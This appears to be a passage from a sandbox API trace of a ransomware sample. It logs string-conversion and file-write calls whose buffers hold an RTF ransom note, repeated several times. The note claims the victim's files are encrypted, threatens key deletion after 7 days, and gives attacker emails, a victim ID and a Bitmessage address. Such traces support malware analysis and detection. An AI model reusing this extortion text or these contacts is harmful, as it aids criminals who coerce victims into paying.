g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.577] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.577] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0286.577] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, 